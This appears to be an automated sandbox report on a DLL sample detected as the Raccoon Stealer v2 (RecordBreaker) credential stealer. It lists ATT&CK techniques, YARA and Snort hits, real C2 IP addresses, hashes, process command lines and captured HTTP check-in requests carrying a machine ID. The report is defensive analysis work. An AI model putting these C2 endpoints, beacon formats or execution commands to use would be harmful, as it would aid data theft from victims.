              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",#1Jump to behavior
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02E91170 cpuid 0_2_02E91170
              Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000003.00000003.274090013.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.271382455.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.300509455.0000000003420000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.272568992.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.300634384.0000000003420000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.271031641.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.278732555.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5036, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000003.00000003.274090013.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.271382455.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.300509455.0000000003420000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.272568992.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.300634384.0000000003420000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.271031641.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.278732555.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5036, type: MEMORYSTR
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation1
              DLL Side-Loading
              111
              Process Injection
              41
              Virtualization/Sandbox Evasion
              1
              Input Capture
              31
              Security Software Discovery
              Remote Services1
              Input Capture
              Exfiltration Over Other Network Medium1
              Encrypted Channel
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading
              111
              Process Injection
              LSASS Memory41
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Archive Collected Data
              Exfiltration Over Bluetooth1
              Non-Application Layer Protocol
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
              Obfuscated Files or Information
              Security Account Manager12
              System Information Discovery
              SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
              Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
              Rundll32
              NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Software Packing
              LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              DLL Side-Loading
              Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 803495 Sample: B94872E1A7599AF25CAA25013FC... Startdate: 10/02/2023 Architecture: WINDOWS Score: 76 27 Snort IDS alert for network traffic 2->27 29 Multi AV Scanner detection for submitted file 2->29 31 Yara detected Raccoon Stealer v2 2->31 33 C2 URLs / IPs found in malware configuration 2->33 7 loaddll32.exe 1 2->7         started        process3 process4 9 rundll32.exe 12 7->9         started        12 cmd.exe 1 7->12         started        14 rundll32.exe 12 7->14         started        16 conhost.exe 7->16         started        signatures5 35 System process connects to network (likely due to code injection or exploit) 9->35 18 rundll32.exe 12 12->18         started        process6 dnsIp7 21 185.229.65.197, 49716, 49717, 49721 LINK-ASRU Russian Federation 18->21 23 85.192.63.204, 49714, 49715, 49720 LINEGROUP-ASRU Russian Federation 18->23 25 192.168.2.1 unknown unknown 18->25

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll44%ReversingLabsWin32.Trojan.Tiggre
              B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll71%VirustotalBrowse
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
              http://185.229.65.197/5563209-4053062332-10020%Avira URL Cloudsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              https://fs.microsoft.c0%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://85.192.63.204/53321935-2125563209-4053062332-10020%Avira URL Cloudsafe
              http://185.229.65.197/ounterMutexv0%Avira URL Cloudsafe
              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
              http://185.229.65.197/4%VirustotalBrowse
              http://85.192.63.204/20%Avira URL Cloudsafe
              http://185.229.65.197/0%Avira URL Cloudsafe
              http://85.192.63.204/0%Avira URL Cloudsafe
              http://185.229.65.197/=D0%Avira URL Cloudsafe
              http://185.229.65.197/c0%Avira URL Cloudsafe
              http://85.192.63.204/c0%Avira URL Cloudsafe
              http://85.192.63.204/b0%Avira URL Cloudsafe
              http://185.229.65.197/90%Avira URL Cloudsafe
              http://85.192.63.204/%0%Avira URL Cloudsafe
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://185.229.65.197/true
              • 4%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://85.192.63.204/true
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://185.229.65.197/5563209-4053062332-1002rundll32.exe, 00000003.00000003.272568992.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279841751.000000000327D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tB94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllfalse
              • URL Reputation: safe
              unknown
              http://185.229.65.197/ounterMutexvrundll32.exe, 00000003.00000003.272568992.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279841751.000000000327D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://sectigo.com/CPS0B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllfalse
              • URL Reputation: safe
              unknown
              https://fs.microsoft.crundll32.exe, 00000003.00000003.272568992.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279841751.000000000327D000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://85.192.63.204/53321935-2125563209-4053062332-1002rundll32.exe, 00000003.00000003.265737014.000000000327D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://ocsp.sectigo.com0B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllfalse
              • URL Reputation: safe
              unknown
              http://85.192.63.204/2rundll32.exe, 00000003.00000002.279841751.000000000324A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllfalse
              • URL Reputation: safe
              unknown
              http://185.229.65.197/=Drundll32.exe, 00000003.00000003.272568992.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.280873956.00000000032A0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://185.229.65.197/crundll32.exe, 00000003.00000003.272568992.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.280873956.00000000032A0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://185.229.65.197/9rundll32.exe, 00000003.00000003.272568992.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.280873956.00000000032A0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://85.192.63.204/brundll32.exe, 00000003.00000002.279841751.000000000324A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://85.192.63.204/crundll32.exe, 00000003.00000003.265737014.00000000032A0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://85.192.63.204/%rundll32.exe, 00000003.00000003.265737014.00000000032A0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              185.229.65.197
              unknownRussian Federation
              48940LINK-ASRUtrue
              85.192.63.204
              unknownRussian Federation
              47711LINEGROUP-ASRUtrue
              IP
              192.168.2.1
              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:803495
              Start date and time:2023-02-10 01:55:41 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 12m 42s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:16
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll
              Detection:MAL
              Classification:mal76.troj.evad.winDLL@10/0@0/3
              EGA Information:
              • Successful, ratio: 50%
              HDC Information:Failed
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .dll
              • Override analysis time to 240s for rundll32
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
              • Execution Graph export aborted for target rundll32.exe, PID 5036 because there are no executed function
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              TimeTypeDescription
              01:56:47API Interceptor1x Sleep call for process: loaddll32.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              85.192.63.204oOb5C7arAh.dllGet hashmaliciousBrowse
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                LINK-ASRUV6lkvGNGV0.elfGet hashmaliciousBrowse
                • 5.158.233.251
                lLicxyp3Ad.elfGet hashmaliciousBrowse
                • 31.134.158.141
                vvCPWuzCU3.elfGet hashmaliciousBrowse
                • 31.134.158.143
                OW9rFQwN9r.elfGet hashmaliciousBrowse
                • 31.134.158.146
                AUIoXxgku9.elfGet hashmaliciousBrowse
                • 31.134.158.115
                YUI3lBwC8a.elfGet hashmaliciousBrowse
                • 37.8.157.76
                VlBtqs8BxH.elfGet hashmaliciousBrowse
                • 146.66.202.124
                file.exeGet hashmaliciousBrowse
                • 185.229.65.140
                file.exeGet hashmaliciousBrowse
                • 185.229.65.140
                file.exeGet hashmaliciousBrowse
                • 185.229.65.140
                file.exeGet hashmaliciousBrowse
                • 185.229.65.140
                file.exeGet hashmaliciousBrowse
                • 185.229.65.140
                file.exeGet hashmaliciousBrowse
                • 185.229.65.140
                file.exeGet hashmaliciousBrowse
                • 185.229.65.140
                file.exeGet hashmaliciousBrowse
                • 185.229.65.140
                file.exeGet hashmaliciousBrowse
                • 185.229.65.140
                file.exeGet hashmaliciousBrowse
                • 185.229.65.140
                X186ICpD6Z.elfGet hashmaliciousBrowse
                • 109.126.35.52
                6sBmn1CQ1O.elfGet hashmaliciousBrowse
                • 31.134.158.114
                fapERCU4lF.elfGet hashmaliciousBrowse
                • 62.122.97.173
                No context
                No context
                No created / dropped files found
                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.98944036665942
                TrID:
                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                • Generic Win/DOS Executable (2004/3) 0.20%
                • DOS Executable Generic (2002/1) 0.20%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll
                File size:2103000
                MD5:4979beaa139791aa9d265ddc00fff0c6
                SHA1:22301285c8a3e4fc0d8086f23265a2b5e7552544
                SHA256:b94872e1a7599af25caa25013fc0054e5affda6cfaef65338aa344ca2b21b4db
                SHA512:43267b709819f47d225013475450b879770f7e8b636be602e54bc83f57189218348027d75e0695cbb0027447ef3cacd7fb2efcc82a2f036f871e3b44c84d3341
                SSDEEP:24576:Or+mhOVsJou/n4JX293Q9vGvvrIs91cYZfT4xvIwDC4k+:BmhOsouP439v6Pc+fTYO4/
                TLSH:68A5C0F491D6BC1FA31F9074C83757A39637AC20AA29EAB45752B102244C36CD1BFFA5
                File Content Preview:MZ......................@...p...............................`...........!..L.!Windows Program..$PE..L...,..c...........!.....t..........(A...............................................A ...@.............................J....@..(........-............ ....
                Icon Hash:f0ccbecbabbab6b0
                Entrypoint:0x10024128
                Entrypoint Section:DSEG
                Digitally signed:true
                Imagebase:0x10000000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                Time Stamp:0x639A1A2C [Wed Dec 14 18:47:08 2022 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:6
                OS Version Minor:0
                File Version Major:6
                File Version Minor:0
                Subsystem Version Major:6
                Subsystem Version Minor:0
                Import Hash:59d147a4d0fec921763249db448e8d8b
                Signature Valid:false
                Signature Issuer:CN=www.trapezium.com
                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                Error Number:-2146762487
                Not Before, Not After
                • 12/29/2022 3:32:57 PM 12/29/2023 3:52:57 PM
                Subject Chain
                • CN=www.trapezium.com
                Version:3
                Thumbprint MD5:A98084DE4B2F52AD14B731DD63D1E262
                Thumbprint SHA-1:764BA94760F13EE39575F9D6D322C596CCFE25E7
                Thumbprint SHA-256:7C0C31688CB0E9B2C134F2F0EEE10561171E24D63740C402A1BCEAF1EA8EBD2F
                Serial:6533EE2F946F17814DE29207352E24D5
                Instruction
                jmp 00007FC540BB6AC7h
                inc ebx
                cmp bl, byte ptr [ecx+edx*4+0005E9F3h]
                add byte ptr [eax], al
                cmp eax, D2BAD1E8h
                shrd esi, esi, 00000000h
                jmp 00007FC540BB6AC5h
                push 0000002Bh
                jmp 00007FC540BB6AC8h
                rol ebx, cl
                shld esi, esi, 00000000h
                pushad
                call 00007FC540BB6AC5h
                sbb esi, eax
                pop ebp
                add ebp, 000010CFh
                neg ecx
                jmp 00007FC540BB716Fh
                nop
                jmp 00007FC540BB6AC4h
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x13d8c80x4aDSEG
                IMAGE_DIRECTORY_ENTRY_IMPORT0x240000x128DSEG
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x210000x2dfd.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x2000000x16d8
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x13d9140x0DSEG
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                DSEG0x10000x180000x0False0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DSEG0x190000x80000x0False0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x210000x30000x2e00False0.3140285326086957data4.3526116480969606IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DSEG0x240000x11a0000x119a00False0.9798350463271194data7.980689708362385IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                NameRVASizeTypeLanguageCountry
                RT_ICON0x212c40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States
                RT_STRING0x2236c0x198data
                RT_STRING0x225040x34cdata
                RT_STRING0x228500x390data
                RT_STRING0x22be00x2f4AmigaOS bitmap font "n", fc_YSize 25856, 21760 elements, 2nd " ", 3rd "e"
                RT_STRING0x22ed40x1f8data
                RT_STRING0x230cc0x2bcdata
                RT_MESSAGETABLE0x233880x70dataEnglishUnited States
                RT_GROUP_ICON0x233f80x14dataEnglishUnited States
                RT_VERSION0x2340c0x344dataEnglishUnited States
                RT_MANIFEST0x237500x6adXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                DLLImport
                KERNEL32.dllGetProcAddress, LoadLibraryA, VirtualAlloc, VirtualFree
                USER32.dllDestroyWindow
                GDI32.dllGetObjectW
                OLE32.dllCoDecodeProxy
                NameOrdinalAddress
                _Start@1610x10008c70
                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                192.168.2.7185.229.65.19749716802036934 02/10/23-01:56:48.125019TCP2036934ET TROJAN Win32/RecordBreaker CnC Checkin M14971680192.168.2.7185.229.65.197
                192.168.2.7185.229.65.19749721802043003 02/10/23-01:57:02.089245TCP2043003ET TROJAN Win32/RecordBreaker - Observed UA M5 (23591)4972180192.168.2.7185.229.65.197
                192.168.2.7185.229.65.19749717802043003 02/10/23-01:56:49.043678TCP2043003ET TROJAN Win32/RecordBreaker - Observed UA M5 (23591)4971780192.168.2.7185.229.65.197
                192.168.2.7185.229.65.19749717802036934 02/10/23-01:56:49.043678TCP2036934ET TROJAN Win32/RecordBreaker CnC Checkin M14971780192.168.2.7185.229.65.197
                192.168.2.7185.229.65.19749716802043003 02/10/23-01:56:48.125019TCP2043003ET TROJAN Win32/RecordBreaker - Observed UA M5 (23591)4971680192.168.2.7185.229.65.197
                192.168.2.7185.229.65.19749721802036934 02/10/23-01:57:02.089245TCP2036934ET TROJAN Win32/RecordBreaker CnC Checkin M14972180192.168.2.7185.229.65.197
                TimestampSource PortDest PortSource IPDest IP
                Feb 10, 2023 01:56:46.908044100 CET4971480192.168.2.785.192.63.204
                Feb 10, 2023 01:56:46.931690931 CET804971485.192.63.204192.168.2.7
                Feb 10, 2023 01:56:47.457200050 CET4971480192.168.2.785.192.63.204
                Feb 10, 2023 01:56:47.480905056 CET804971485.192.63.204192.168.2.7
                Feb 10, 2023 01:56:47.612174988 CET4971580192.168.2.785.192.63.204
                Feb 10, 2023 01:56:47.636337042 CET804971585.192.63.204192.168.2.7
                Feb 10, 2023 01:56:47.992449045 CET4971480192.168.2.785.192.63.204
                Feb 10, 2023 01:56:48.016012907 CET804971485.192.63.204192.168.2.7
                Feb 10, 2023 01:56:48.080369949 CET4971680192.168.2.7185.229.65.197
                Feb 10, 2023 01:56:48.109889984 CET8049716185.229.65.197192.168.2.7
                Feb 10, 2023 01:56:48.110126019 CET4971680192.168.2.7185.229.65.197
                Feb 10, 2023 01:56:48.125019073 CET4971680192.168.2.7185.229.65.197
                Feb 10, 2023 01:56:48.154447079 CET8049716185.229.65.197192.168.2.7
                Feb 10, 2023 01:56:48.226794958 CET4971580192.168.2.785.192.63.204
                Feb 10, 2023 01:56:48.256918907 CET804971585.192.63.204192.168.2.7
                Feb 10, 2023 01:56:48.836158991 CET4971580192.168.2.785.192.63.204
                Feb 10, 2023 01:56:48.859958887 CET804971585.192.63.204192.168.2.7
                Feb 10, 2023 01:56:48.953732967 CET4971780192.168.2.7185.229.65.197
                Feb 10, 2023 01:56:48.983263016 CET8049717185.229.65.197192.168.2.7
                Feb 10, 2023 01:56:48.983376980 CET4971780192.168.2.7185.229.65.197
                Feb 10, 2023 01:56:49.043678045 CET4971780192.168.2.7185.229.65.197
                Feb 10, 2023 01:56:49.073124886 CET8049717185.229.65.197192.168.2.7
                Feb 10, 2023 01:56:51.175576925 CET8049716185.229.65.197192.168.2.7
                Feb 10, 2023 01:56:52.040090084 CET8049717185.229.65.197192.168.2.7
                Feb 10, 2023 01:57:00.353707075 CET4972080192.168.2.785.192.63.204
                Feb 10, 2023 01:57:00.377062082 CET804972085.192.63.204192.168.2.7
                Feb 10, 2023 01:57:01.040347099 CET4972080192.168.2.785.192.63.204
                Feb 10, 2023 01:57:01.063755035 CET804972085.192.63.204192.168.2.7
                Feb 10, 2023 01:57:01.634138107 CET4972080192.168.2.785.192.63.204
                Feb 10, 2023 01:57:01.659589052 CET804972085.192.63.204192.168.2.7
                Feb 10, 2023 01:57:02.021606922 CET4972180192.168.2.7185.229.65.197
                Feb 10, 2023 01:57:02.051450968 CET8049721185.229.65.197192.168.2.7
                Feb 10, 2023 01:57:02.051661968 CET4972180192.168.2.7185.229.65.197
                Feb 10, 2023 01:57:02.089245081 CET4972180192.168.2.7185.229.65.197
                Feb 10, 2023 01:57:02.118938923 CET8049721185.229.65.197192.168.2.7
                Feb 10, 2023 01:57:05.131470919 CET8049721185.229.65.197192.168.2.7
                • 185.229.65.197
                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.749716185.229.65.19780C:\Windows\SysWOW64\rundll32.exe
                TimestampkBytes transferredDirectionData
                Feb 10, 2023 01:56:48.125019073 CET9OUTPOST / HTTP/1.1
                Accept: */*
                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                User-Agent: 23591
                Host: 185.229.65.197
                Content-Length: 98
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 66 72 6f 6e 74 64 65 73 6b 26 63 6f 6e 66 69 67 49 64 3d 65 35 30 31 66 64 63 37 38 66 66 33 65 64 62 62 39 66 37 32 30 65 31 37 36 36 65 31 34 64 65 64
                Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=e501fdc78ff3edbb9f720e1766e14ded


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.749717185.229.65.19780C:\Windows\SysWOW64\rundll32.exe
                TimestampkBytes transferredDirectionData
                Feb 10, 2023 01:56:49.043678045 CET10OUTPOST / HTTP/1.1
                Accept: */*
                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                User-Agent: 23591
                Host: 185.229.65.197
                Content-Length: 98
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 66 72 6f 6e 74 64 65 73 6b 26 63 6f 6e 66 69 67 49 64 3d 65 35 30 31 66 64 63 37 38 66 66 33 65 64 62 62 39 66 37 32 30 65 31 37 36 36 65 31 34 64 65 64
                Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=e501fdc78ff3edbb9f720e1766e14ded


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.749721185.229.65.19780C:\Windows\SysWOW64\rundll32.exe
                TimestampkBytes transferredDirectionData
                Feb 10, 2023 01:57:02.089245081 CET201OUTPOST / HTTP/1.1
                Accept: */*
                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                User-Agent: 23591
                Host: 185.229.65.197
                Content-Length: 98
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 66 72 6f 6e 74 64 65 73 6b 26 63 6f 6e 66 69 67 49 64 3d 65 35 30 31 66 64 63 37 38 66 66 33 65 64 62 62 39 66 37 32 30 65 31 37 36 36 65 31 34 64 65 64
                Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=e501fdc78ff3edbb9f720e1766e14ded


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:01:56:36
                Start date:10/02/2023
                Path:C:\Windows\System32\loaddll32.exe
                Wow64 process (32bit):true
                Commandline:loaddll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll"
                Imagebase:0xf00000
                File size:116736 bytes
                MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:1
                Start time:01:56:36
                Start date:10/02/2023
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6edaf0000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:2
                Start time:01:56:36
                Start date:10/02/2023
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",#1
                Imagebase:0xa60000
                File size:232960 bytes
                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:3
                Start time:01:56:36
                Start date:10/02/2023
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll,_Start@16
                Imagebase:0x850000
                File size:61952 bytes
                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                Has elevated privileges:true
